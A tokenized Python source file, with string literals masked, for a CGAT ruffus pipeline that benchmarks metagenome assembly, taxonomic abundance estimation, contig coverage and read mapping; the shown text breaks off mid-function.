<s> """<STR_LIT>""" <EOL> from ruffus import * <EOL> import time <EOL> import CGAT . Experiment as E <EOL> import logging as L <EOL> import CGAT . Database as Database <EOL> import CGAT . CSV as CSV <EOL> import sys <EOL> import os <EOL> import re <EOL> import shutil <EOL> import itertools <EOL> import math <EOL> import glob <EOL> import time <EOL> import gzip <EOL> import collections <EOL> import random <EOL> import numpy <EOL> import sqlite3 <EOL> import CGAT . GTF as GTF <EOL> import CGAT . IOTools as IOTools <EOL> import CGAT . IndexedFasta as IndexedFasta <EOL> from rpy2 . robjects import r as R <EOL> import rpy2 . robjects as ro <EOL> import rpy2 . robjects . vectors as rovectors <EOL> from rpy2 . rinterface import RRuntimeError <EOL> import CGATPipelines . PipelineMapping as PipelineMapping <EOL> import CGAT . FastaIterator as FastaIterator <EOL> import CGATPipelines . PipelineMapping as PipelineMapping <EOL> import CGATPipelines . PipelineMappingQC as PipelineMappingQC <EOL> import CGAT . Bed as Bed <EOL> import CGAT . Nucmer as Nucmer <EOL> import pysam <EOL> import CGAT . Fastq as Fastq <EOL> import sqlite3 <EOL> import CGATPipelines . PipelineMetagenomeBenchmark as PipelineMetagenomeBenchmark <EOL> import CGATPipelines . PipelineMetagenomeAssembly as PipelineMetagenomeAssembly <EOL> import CGAT . Pipeline as P <EOL> P . getParameters ( <EOL> [ "<STR_LIT>" ] ) <EOL> PARAMS = P . PARAMS <EOL> SEQUENCE_FILES = glob . glob ( "<STR_LIT>" ) + glob . glob ( "<STR_LIT>" ) <EOL> GENOMES = glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) <EOL> CONTIGS = glob . glob ( "<STR_LIT>" ) <EOL> ALIGNMENTS = glob . glob ( "<STR_LIT>" ) <EOL> def dbList ( xset ) : <EOL> '''<STR_LIT>''' <EOL> return "<STR_LIT:(>" + "<STR_LIT:U+002C>" . join ( [ "<STR_LIT:'>" + x + "<STR_LIT:'>" for x in xset ] ) + "<STR_LIT:)>" <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( GENOMES , r"<STR_LIT>" ) <EOL> def buildGiAccessionNumbers ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> for inf in infiles : <EOL> outf . write ( open ( inf ) . readline ( ) . split ( "<STR_LIT:|>" ) [ <NUM_LIT:1> ] + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ merge ( [ buildGiAccessionNumbers ] + <EOL> [ os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , x ) <EOL> for x in [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ] , <EOL> "<STR_LIT>" ) <EOL> def buildGi2Taxa ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> gi_accessions = infiles [ <NUM_LIT:0> ] <EOL> ncbi_map = infiles [ <NUM_LIT:1> ] <EOL> gi2taxid_map = infiles [ <NUM_LIT:2> ] <EOL> codes = infiles [ <NUM_LIT:3> ] <EOL> nodes = infiles [ <NUM_LIT:4> ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildGiAccessionNumbers , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadGiAccessionNumbers ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ transform ( SEQUENCE_FILES , regex ( "<STR_LIT>" ) , add_inputs ( buildGi2Taxa ) , r"<STR_LIT>" ) <EOL> def buildTrueTaxonomicRelativeAbundances ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> PipelineMetagenomeBenchmark . buildTrueTaxonomicRelativeAbundances ( <EOL> infiles , outfile ) <EOL> @ jobs_limit ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> @ transform ( buildTrueTaxonomicRelativeAbundances , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadTrueTaxonomicAbundances ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( glob . glob ( os . path . join ( os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) , "<STR_LIT>" ) ) , regex ( "<STR_LIT>" ) , r"<STR_LIT>" ) <EOL> def loadEstimatedTaxonomicRelativeAbundances ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ jobs_limit ( <NUM_LIT:1> , "<STR_LIT:R>" ) <EOL> @ transform ( loadTrueTaxonomicAbundances , suffix ( "<STR_LIT>" ) , add_inputs ( loadEstimatedTaxonomicRelativeAbundances ) , "<STR_LIT>" ) <EOL> def plotRelativeAbundanceCorrelations ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PipelineMetagenomeBenchmark . plotRelativeAbundanceCorrelations ( <EOL> infiles , outfile ) <EOL> @ transform ( loadTrueTaxonomicAbundances , suffix ( "<STR_LIT>" ) , add_inputs ( loadEstimatedTaxonomicRelativeAbundances ) , "<STR_LIT>" ) <EOL> def calculateFalsePositiveRate ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PipelineMetagenomeBenchmark . calculateFalsePositiveRate ( infiles , outfile ) <EOL> @ merge ( calculateFalsePositiveRate , "<STR_LIT>" ) <EOL> def mergeFalsePositiveRates ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> header = "<STR_LIT>" <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( header ) <EOL> for inf in infiles : <EOL> for line in open ( inf ) . readlines ( ) : <EOL> outf . write ( line ) <EOL> outf . close ( ) <EOL> @ transform ( mergeFalsePositiveRates , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def plotFalsePositiveRates ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % <EOL> infile ) <EOL> for i in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> outf = P . snip ( outfile , "<STR_LIT>" ) + "<STR_LIT>" % i <EOL> R ( '''<STR_LIT>''' % <EOL> i ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outf ) <EOL> outf = P . snip ( outfile , "<STR_LIT>" ) + "<STR_LIT>" % i <EOL> R ( '''<STR_LIT>''' % <EOL> i ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outf ) <EOL> P . touch ( outfile ) <EOL> @ transform ( calculateFalsePositiveRate , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadFalsePositiveRate ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ transform ( loadEstimatedTaxonomicRelativeAbundances , suffix ( "<STR_LIT>" ) , add_inputs ( loadTrueTaxonomicAbundances ) , "<STR_LIT>" ) <EOL> def compareAbundanceOfFalsePositiveSpecies ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename_estimate = P . toTable ( infiles [ <NUM_LIT:0> ] ) <EOL> track = P . snip ( <EOL> os . path . basename ( infiles [ <NUM_LIT:0> ] ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> tablename_true = [ P . toTable ( x ) for x in infiles [ <NUM_LIT:1> : ] if P . snip ( <EOL> os . path . basename ( x ) , "<STR_LIT>" ) == track ] [ <NUM_LIT:0> ] <EOL> dbh = sqlite3 . connect ( "<STR_LIT>" ) <EOL> cc = dbh . cursor ( ) <EOL> tmp = P . getTempFile ( "<STR_LIT:.>" ) <EOL> tmp . write ( "<STR_LIT>" ) <EOL> estimate = { } <EOL> true = set ( ) <EOL> for data in cc . execute ( """<STR_LIT>""" % tablename_estimate ) . fetchall ( ) : <EOL> estimate [ data [ <NUM_LIT:0> ] ] = data [ <NUM_LIT:1> ] <EOL> for data in cc . execute ( """<STR_LIT>""" % tablename_true ) . fetchall ( ) : <EOL> true . add ( data [ <NUM_LIT:0> ] ) <EOL> for taxa , abundance in estimate . iteritems ( ) : <EOL> if taxa in true : <EOL> tmp . write ( "<STR_LIT>" % ( taxa , abundance ) ) <EOL> else : <EOL> tmp . write ( "<STR_LIT>" % ( taxa , abundance ) ) <EOL> tmp . close ( ) <EOL> inf = tmp . name <EOL> if track . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> col = "<STR_LIT>" <EOL> elif track . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> col = "<STR_LIT>" <EOL> elif track . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> col = "<STR_LIT>" <EOL> R ( '''<STR_LIT>''' % <EOL> inf ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % <EOL> col ) <EOL> R ( '''<STR_LIT>''' % outfile ) <EOL> os . unlink ( inf ) <EOL> @ follows ( loadFalsePositiveRate , plotRelativeAbundanceCorrelations ) <EOL> def taxonomy ( ) : <EOL> pass <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def buildAssemblyStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> assemblers = P . asList ( PARAMS . get ( "<STR_LIT>" ) ) <EOL> dbh = sqlite3 . connect ( infile ) <EOL> cc = dbh . cursor ( ) <EOL> result = { } <EOL> alignment_stats_names = [ ] <EOL> for assembler in assemblers : <EOL> tablename = "<STR_LIT>" % assembler <EOL> for data in cc . execute ( """<STR_LIT>""" % tablename ) . fetchall ( ) : <EOL> track = "<STR_LIT>" % assembler + data [ <NUM_LIT:0> ] <EOL> result [ track ] = list ( data [ <NUM_LIT:1> : ] ) <EOL> alignment_stats_names . append ( track + "<STR_LIT>" ) <EOL> for a in alignment_stats_names : <EOL> a = P . toTable ( a + "<STR_LIT>" ) <EOL> for data in cc . execute ( """<STR_LIT>""" % a ) . fetchall ( ) : <EOL> track = a [ : - len ( "<STR_LIT>" ) ] . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> result [ track ] . append ( data [ <NUM_LIT:0> ] ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for track , results in result . iteritems ( ) : <EOL> assembler = track . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] <EOL> track = track . split ( "<STR_LIT:_>" ) [ <NUM_LIT:1> ] . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( [ assembler , track ] + map ( str , results ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" ) <EOL> def plotLengthCumProp ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> inf250 = [ x for x in infiles if x . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> inf150 = [ x for x in infiles if x . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> inf100 = [ x for x in infiles if x . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> R ( '''<STR_LIT>''' % inf250 ) <EOL> R ( '''<STR_LIT>''' % inf150 ) <EOL> R ( '''<STR_LIT>''' % inf100 ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outfile ) <EOL> @ jobs_limit ( <NUM_LIT:1> , "<STR_LIT:R>" ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) ) , <EOL> regex ( "<STR_LIT>" ) , <EOL> add_inputs ( glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) ) ) , <EOL> r"<STR_LIT>" ) <EOL> def plotCoverageProfile ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> track = P . snip ( os . path . basename ( infiles [ <NUM_LIT:0> ] ) , "<STR_LIT>" ) <EOL> length_file = [ inf for inf in infiles [ <NUM_LIT:1> ] if inf . find ( track ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> R ( '''<STR_LIT>''' % ( infiles [ <NUM_LIT:0> ] , length_file , outfile ) ) <EOL> R [ "<STR_LIT>" ] ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) ) , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def countCompleteGenes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> start = "<STR_LIT>" <EOL> stop = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ntotal = <NUM_LIT:0> <EOL> nstart = <NUM_LIT:0> <EOL> nstop = <NUM_LIT:0> <EOL> nstart_nstop = <NUM_LIT:0> <EOL> for fasta in FastaIterator . iterate ( IOTools . openFile ( infile ) ) : <EOL> ntotal += <NUM_LIT:1> <EOL> if fasta . sequence . startswith ( start ) : <EOL> nstart += <NUM_LIT:1> <EOL> if fasta . sequence [ - <NUM_LIT:3> : len ( fasta . sequence ) ] in stop : <EOL> nstop += <NUM_LIT:1> <EOL> if fasta . sequence . startswith ( start ) and fasta . sequence [ - <NUM_LIT:3> : len ( fasta . sequence ) ] in stop : <EOL> nstart_nstop += <NUM_LIT:1> <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , [ ntotal , float ( nstart ) / ntotal , float ( nstop ) / ntotal , float ( nstart_nstop ) / ntotal ] ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ active_if ( "<STR_LIT>" in PARAMS and "<STR_LIT>" in PARAMS [ "<STR_LIT>" ] ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( glob . glob ( os . path . join ( <EOL> PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" ) <EOL> def compareIdbaLengthDistributions ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> l100 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> l150 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> l250 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> R ( '''<STR_LIT>''' % <EOL> l100 ) <EOL> R ( '''<STR_LIT>''' % <EOL> l150 ) <EOL> R ( '''<STR_LIT>''' % <EOL> l250 ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outfile ) <EOL> @ active_if ( "<STR_LIT>" in PARAMS and "<STR_LIT>" in PARAMS [ "<STR_LIT>" ] ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( glob . glob ( os . path . join ( <EOL> PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" ) <EOL> def IdbaLengthDistributionStats ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> l100 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> l150 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> l250 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> R ( '''<STR_LIT>''' % <EOL> l100 ) <EOL> R ( '''<STR_LIT>''' % <EOL> l150 ) <EOL> R ( '''<STR_LIT>''' % <EOL> l250 ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outfile ) <EOL> COVERAGE_FILES = glob . glob ( <EOL> os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( CONTIGS , regex ( "<STR_LIT>" ) , add_inputs ( * COVERAGE_FILES ) , r"<STR_LIT>" ) <EOL> def filterContigsByCoverage ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . submit ( "<STR_LIT>" , "<STR_LIT>" , <EOL> infiles = infiles , outfiles = outfile ) <EOL> @ transform ( filterContigsByCoverage , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildFilteredContigStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PARAMS [ "<STR_LIT>" ] = None <EOL> PARAMS [ "<STR_LIT>" ] = <NUM_LIT:50> <EOL> PipelineGenomeAssembly . contig_to_stats ( infile , outfile , PARAMS ) <EOL> @ transform ( filterContigsByCoverage , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildFilteredContigLengths ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PARAMS [ "<STR_LIT>" ] = None <EOL> PipelineGenomeAssembly . build_scaffold_lengths ( infile , outfile , PARAMS ) <EOL> @ transform ( buildFilteredContigLengths , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadFilteredContigLengths ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outname = P . snip ( os . path . dirname ( infile ) , "<STR_LIT>" ) + "<STR_LIT:_>" + P . snip ( os . path . basename ( infile ) , "<STR_LIT>" ) + "<STR_LIT>" <EOL> P . load ( infile , outname ) <EOL> P . touch ( outfile ) <EOL> @ transform ( buildFilteredContigStats , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadFilteredContigStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> def alignmentTargets ( genome_files , contig_files ) : <EOL> '''<STR_LIT>''' <EOL> parameters = [ ] <EOL> for genome , contig in itertools . product ( genome_files , contig_files ) : <EOL> outfile = os . path . join ( "<STR_LIT>" , P . snip ( <EOL> contig , "<STR_LIT>" ) + "<STR_LIT>" + P . snip ( os . path . basename ( genome ) , "<STR_LIT>" ) ) + "<STR_LIT>" <EOL> parameters . append ( [ genome , outfile , contig ] ) <EOL> return parameters <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ files ( alignmentTargets ( GENOMES , CONTIGS ) ) <EOL> def alignContigsToReference ( infile , outfile , param ) : <EOL> '''<STR_LIT>''' <EOL> print infile , param <EOL> to_cluster = True <EOL> reffile , contigfile = infile , param <EOL> pattern = P . snip ( os . path . basename ( outfile ) , "<STR_LIT>" ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> outf = os . path . basename ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( alignContigsToReference , regex ( "<STR_LIT>" ) , r"<STR_LIT>" ) <EOL> def filterAlignments ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( filterAlignments , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildAlignmentCoordinates ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildAlignmentCoordinates , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def createAlignmentBedFiles ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( createAlignmentBedFiles , "<STR_LIT>" ) <EOL> def buildAlignmentSizes ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for infile in infiles : <EOL> genome = P . snip ( os . path . basename ( infile ) , "<STR_LIT>" ) <EOL> c = <NUM_LIT:0> <EOL> inf = IOTools . openFile ( infile ) <EOL> for bed in Bed . iterator ( inf ) : <EOL> c += bed . end - bed . start <EOL> outf . write ( "<STR_LIT>" % ( genome , str ( c ) ) ) <EOL> outf . close ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( glob . glob ( <EOL> os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) ) , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def collectGenomeSizes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for fasta in FastaIterator . iterate ( IOTools . openFile ( infile ) ) : <EOL> name = P . snip ( os . path . basename ( infile ) , "<STR_LIT>" ) <EOL> length = len ( list ( fasta . sequence ) ) <EOL> outf . write ( "<STR_LIT>" % ( name , str ( length ) ) ) <EOL> outf . close ( ) <EOL> @ merge ( collectGenomeSizes , "<STR_LIT>" ) <EOL> def mergeGenomeSizes ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> all_data = [ ] <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> header = open ( infiles [ <NUM_LIT:0> ] ) . readline ( ) <EOL> outf . write ( header ) <EOL> for infile in infiles : <EOL> inf = open ( infile ) <EOL> header = inf . readline ( ) <EOL> outf . write ( inf . readline ( ) ) <EOL> outf . close ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( SEQUENCE_FILES , regex ( "<STR_LIT>" ) , add_inputs ( mergeGenomeSizes ) , r"<STR_LIT>" ) <EOL> def buildExpectedGenomeCoverage ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . submit ( "<STR_LIT>" , <EOL> "<STR_LIT>" , infiles = infiles , outfiles = outfile ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( [ buildAlignmentSizes , mergeGenomeSizes ] , "<STR_LIT>" ) <EOL> def buildCoverageOverGenomes ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . submit ( "<STR_LIT>" , "<STR_LIT>" , <EOL> infiles = infiles , outfiles = outfile ) <EOL> @ transform ( buildExpectedGenomeCoverage , regex ( "<STR_LIT>" ) , add_inputs ( buildCoverageOverGenomes ) , r"<STR_LIT>" ) <EOL> def mergeExpectedAndObservedGenomeCoverage ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> expected = open ( infiles [ <NUM_LIT:0> ] ) <EOL> expected_header = expected . readline ( ) <EOL> observed = open ( infiles [ <NUM_LIT:1> ] ) <EOL> observed_header = observed . readline ( ) <EOL> expected_data = { } <EOL> E . info ( "<STR_LIT>" ) <EOL> for line in expected . readlines ( ) : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> gi , coverage = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] <EOL> expected_data [ gi ] = coverage <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> E . info ( "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for line in observed . readlines ( ) : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> track , gi , species , coverage = data [ <NUM_LIT:0> ] , data [ <EOL> <NUM_LIT:1> ] , "<STR_LIT:_>" . join ( data [ <NUM_LIT:2> ] . split ( "<STR_LIT:_>" ) [ <NUM_LIT:5> : <NUM_LIT:7> ] ) , data [ <NUM_LIT:3> ] <EOL> outf . write ( "<STR_LIT>" % <EOL> ( track , gi , species , coverage , expected_data [ gi ] ) ) <EOL> outf . close ( ) <EOL> @ transform ( mergeExpectedAndObservedGenomeCoverage , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadExpectedAndObservedGenomeCoverage ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ split ( buildCoverageOverGenomes , "<STR_LIT>" ) <EOL> def plotCoverageOverGenomes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PipelineMetagenomeBenchmark . plotCoverageOverGenomes ( infile , outfile ) <EOL> def chimeraTargets ( alignment_files , contig_files ) : <EOL> '''<STR_LIT>''' <EOL> parameters = [ ] <EOL> for alignment , contig in itertools . product ( genome_files , contig_files ) : <EOL> outfile = os . path . join ( <EOL> "<STR_LIT>" , P . snip ( alignment , "<STR_LIT>" ) + "<STR_LIT>" ) <EOL> parameters . append ( [ outfile , alignment , contig ] ) <EOL> return parameters <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( ALIGNMENTS , regex ( "<STR_LIT>" ) , add_inputs ( CONTIGS ) , r"<STR_LIT>" ) <EOL> def buildSpeciesMap ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> bam = infiles [ <NUM_LIT:0> ] <EOL> contig = [ x for x in infiles [ <NUM_LIT:1> ] if P . snip ( <EOL> x , "<STR_LIT>" ) == P . snip ( bam , "<STR_LIT>" ) ] [ <NUM_LIT:0> ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildSpeciesMap , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def renameGenomesInSpeciesMap ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> genomes_dir = PARAMS [ "<STR_LIT>" ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( CONTIGS , regex ( "<STR_LIT>" ) , add_inputs ( renameGenomesInSpeciesMap ) , r"<STR_LIT>" ) <EOL> def buildExpectedContigs ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = False <EOL> contig = infiles [ <NUM_LIT:0> ] <EOL> inputs = [ infile for infile in infiles if infile != contig ] <EOL> species_map = [ infile for infile in inputs if P . snip ( <EOL> os . path . basename ( infile ) , "<STR_LIT>" ) == P . snip ( contig , "<STR_LIT>" ) ] [ <NUM_LIT:0> ] <EOL> genomes_dir = PARAMS [ "<STR_LIT>" ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildExpectedContigs , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildBwaIndices ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> P . touch ( outfile ) <EOL> @ transform ( buildBwaIndices , regex ( "<STR_LIT>" ) , add_inputs ( SEQUENCE_FILES ) , r"<STR_LIT>" ) <EOL> def mapReadsWithBwaAgainstExpectedContigs ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> index_dir = os . path . dirname ( outfile ) <EOL> genome = os . path . basename ( <EOL> re . search ( "<STR_LIT>" , infiles [ <NUM_LIT:0> ] ) . group ( <NUM_LIT:0> ) + "<STR_LIT>" ) <EOL> track = P . snip ( genome , "<STR_LIT>" ) <EOL> fastq = [ infile for infile in infiles [ <NUM_LIT:1> ] <EOL> if P . snip ( infile , "<STR_LIT>" ) == track ] [ <NUM_LIT:0> ] <EOL> job_options = "<STR_LIT>" % ( PARAMS [ "<STR_LIT>" ] ) <EOL> bwa_index_dir = index_dir <EOL> bwa_aln_options = PARAMS [ "<STR_LIT>" ] <EOL> bwa_sampe_options = PARAMS [ "<STR_LIT>" ] <EOL> bwa_threads = PARAMS [ "<STR_LIT>" ] <EOL> m = PipelineMapping . BWA ( remove_non_unique = 